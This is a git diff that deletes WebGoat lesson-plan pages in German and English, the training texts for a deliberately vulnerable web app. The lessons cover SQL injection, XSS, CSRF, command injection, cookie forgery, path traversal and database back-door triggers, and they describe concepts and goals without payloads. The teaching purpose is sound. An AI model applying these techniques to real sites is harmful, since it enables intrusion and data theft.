-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
-als Resultat alle Wetterdaten anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/SqlStringInjection.html b/src/main/webapp/lesson_plans/German/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/German/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lehrplan: Durchführung von String SQL Injection
-
-
-
Konzept:
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
-exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
-Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/StoredXss.html b/src/main/webapp/lesson_plans/German/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/German/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
-
-
Konzept:
-
-Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
-und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
-wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
-Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
-Seite bzw. Inhalt anzuzeigen.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Lehrplan: Einen Authentisierungs Cookie fa¨lschen
-
-
-
Lehrinhalt:
-
-Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
-Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
-Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
-Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
-Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
-die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-
- Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
- und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
- versuchen Sie Ihre Identität zu "alice" zu wechseln.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/BasicAuthentication.html b/src/main/webapp/lesson_plans/de/BasicAuthentication.html
deleted file mode 100644
index 65490ef0c..000000000
--- a/src/main/webapp/lesson_plans/de/BasicAuthentication.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lehrplan: Basic Authentication
-
-
Lehrinhalt:
-
-"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage.
-Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource.
-Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver.
-Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind.
-Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer
-sie ein weiteres Mal eingeben muss.
-
-
Grundsätzliche(s) Ziel(e):
-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
-
diff --git a/src/main/webapp/lesson_plans/de/CommandInjection.html b/src/main/webapp/lesson_plans/de/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/de/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Einschleusen von Programmcode
-
-
Konzept:
-
-Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
-sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lehrplan: Versteckte Felder ausnutzen
-
-
Konzept:
-
-Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
-Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
-diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
-zu seinem Vorteil manipulieren kann.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/de/HtmlClues.html b/src/main/webapp/lesson_plans/de/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/de/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lehrplan: Nützliche Hinweise in HTML entdecken.
-
-
-
Konzept:
-
- Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
- Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HttpBasics.html b/src/main/webapp/lesson_plans/de/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
Lehrplan: Http Basics
-
-
-
Lehrinhalt:
- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-
-So funktioniert HTTP:
-
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
-Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-
GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-
-
Grundsätzliche(s) Ziel(e):
-
-Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
-
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden.
-Außerdem, können Sie hier WebScarab gut ausprobieren.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html b/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
-Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
-Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
-einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
-Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
-in der Applikation benutzt werden.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
-überprüft. Versuchen Sie diese
-Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
-gleichzeitig brechen!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/LogSpoofing.html b/src/main/webapp/lesson_plans/de/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/de/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
-
-
-
Konzept:
-
-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
-bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
-Handlungen verleiten bzw. ihn einfach nur verwirren.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben.
-
diff --git a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
-
-
Konzept:
-
-In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
-er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
-der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
-
-
Grundsätzliche(s) Ziel(e):
-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/de/ReflectedXSS.html b/src/main/webapp/lesson_plans/de/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/de/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Cross Site Scripting (XSS)
-
-
Konzept:
-
-Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
-XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
-Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
-URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
-URL zu besuchen.
-
-
-
-
General Goal(s):
-
-Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
-Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
-so dass das Skript in Ihrem Browser ausgeführt wird.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Zugang zu Web-Resourcen erzwingen
-
-
Konzept::
-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
-für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
-
-
Grundsätzliche(s) Ziel(e):
-
-Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
-von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
-für das Bestehen dieser Lektion.
-Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
-die Lektion abgeschlossen haben.
-
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
-als Resultat alle Wetterdaten anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/SqlStringInjection.html b/src/main/webapp/lesson_plans/de/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/de/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lehrplan: Durchführung von String SQL Injection
-
-
-
Konzept:
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
-exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
-Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/StoredXss.html b/src/main/webapp/lesson_plans/de/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/de/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
-
-
Konzept:
-
-Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
-und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
-wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
-Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
-Seite bzw. Inhalt anzuzeigen.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Lehrplan: Einen Authentisierungs Cookie fa¨lschen
-
-
-
Lehrinhalt:
-
-Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
-Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
-Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
-Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
-Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
-die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-
- Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
- und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
- versuchen Sie Ihre Identität zu "alice" zu wechseln.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html b/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
deleted file mode 100644
index 576bf3b72..000000000
--- a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Using an Access Control Matrix
-
-
Concept / Topic To Teach:
-
-In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.
-
General Goal(s):
-Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.
-
diff --git a/src/main/webapp/lesson_plans/en/BackDoors.html b/src/main/webapp/lesson_plans/en/BackDoors.html
deleted file mode 100644
index c4ac8a08a..000000000
--- a/src/main/webapp/lesson_plans/en/BackDoors.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Lesson Plan Title: How to Create Database Back Door Attacks.
-
-
-
Concept / Topic To Teach:
-How to Create Database Back Door Attacks.
-
-
-
-How the attacks works:
-
-Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also
-be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management
-system upon the execution of another database operation like insert, select, update or delete. An attacker for example
-can create a trigger that would set his email address instead of every new user's email address.
-
-
General Goal(s):
-
-* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.
-* You will not be able to actually create one in this lesson because the underlying database engine used with WebGoat doesn't support triggers.
-* Your login ID is 101.
-
-
diff --git a/src/main/webapp/lesson_plans/en/BasicAuthentication.html b/src/main/webapp/lesson_plans/en/BasicAuthentication.html
deleted file mode 100644
index 73a3c736d..000000000
--- a/src/main/webapp/lesson_plans/en/BasicAuthentication.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Basic Authentication
-
-
Concept / Topic To Teach:
-
-Basic Authentication is used to protect server side resources. The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.
-
General Goal(s):
-For this lesson, your goal is to understand Basic Authentication and answer the questions below.
-
diff --git a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html b/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
deleted file mode 100644
index 0ff76e32e..000000000
--- a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: How to Perform Blind SQL Injection
-
-
-
Concept / Topic To Teach:
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of SQL injection.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
-
-
-
General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
The goal is to find the value of the first_name in table user_data for userid 15613. Put that name in the form to pass the lesson.
diff --git a/src/main/webapp/lesson_plans/en/BufferOverflow.html b/src/main/webapp/lesson_plans/en/BufferOverflow.html
deleted file mode 100644
index b25b4f944..000000000
--- a/src/main/webapp/lesson_plans/en/BufferOverflow.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Buffer Overflows
-
-
-
Concept / Topic To Teach:
-How to Exploit Buffer Overflows.
-
General Goal(s):
-This lesson needs a creator!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/CSRF.html b/src/main/webapp/lesson_plans/en/CSRF.html
deleted file mode 100644
index 594d049bd..000000000
--- a/src/main/webapp/lesson_plans/en/CSRF.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Request Forgery.
-
-
-
Concept / Topic To Teach:
- This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
-
-
-
-How the attacks works:
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below:
-
-
-
-When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function.
-
-The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request.
-
-In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website
-
-
General Goal(s):
-
-Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu. Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
diff --git a/src/main/webapp/lesson_plans/en/ChallengeScreen.html b/src/main/webapp/lesson_plans/en/ChallengeScreen.html
deleted file mode 100644
index b3d9b3321..000000000
--- a/src/main/webapp/lesson_plans/en/ChallengeScreen.html
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
Lesson Plan Title: Putting it all together
-
-
Concept / Topic To Teach:
-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html b/src/main/webapp/lesson_plans/en/ClientSideFiltering.html
deleted file mode 100644
index 608c360e5..000000000
--- a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: Client Side Filtering
-
-
Concept / Topic To Teach:
-
-It is always a good practice to send to the client only information which they are supposed
-to have access to. In this lesson, too much information is being sent to the client, creating
-a serious access control problem.
-
-
General Goal(s):
-For this exercise, your mission is exploit the extraneous information being returned by the
-server to discover information to which you should not have access.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ClientSideValidation.html b/src/main/webapp/lesson_plans/en/ClientSideValidation.html
deleted file mode 100644
index e712b6fb7..000000000
--- a/src/main/webapp/lesson_plans/en/ClientSideValidation.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: Insecure Client Storage
-
-
Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side. Leaving the
-mechanism for validation on the client side leaves it vulnerable to reverse
-engineering. Remember, anything on the client side should not be
-considered a secret.
-
-
General Goal(s):
-For this exercise, your mission is to discover a coupon code to receive an unintended
-discount. Then, exploit the use of client side validation to submit an order with a
-cost of zero.
-
diff --git a/src/main/webapp/lesson_plans/en/CommandInjection.html b/src/main/webapp/lesson_plans/en/CommandInjection.html
deleted file mode 100644
index 1db97ab80..000000000
--- a/src/main/webapp/lesson_plans/en/CommandInjection.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Command Injection
-
-
Concept / Topic To Teach:
-
-Command injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of parameter injection.
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
-Try to inject a command to the operating system.
-
-
General Goal(s):
-The user should be able to execute any command on the hosting OS.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html b/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
deleted file mode 100644
index 4a2f44b75..000000000
--- a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
- Lesson Plan
-
-
-
-
-
Lesson Plan Title: Shopping Cart Concurrency Flaw
-
-
-
Concept / Topic To Teach:
-
- Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-
General Goal(s):
-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html b/src/main/webapp/lesson_plans/en/CrossSiteScripting.html
deleted file mode 100644
index 1d2848f3c..000000000
--- a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
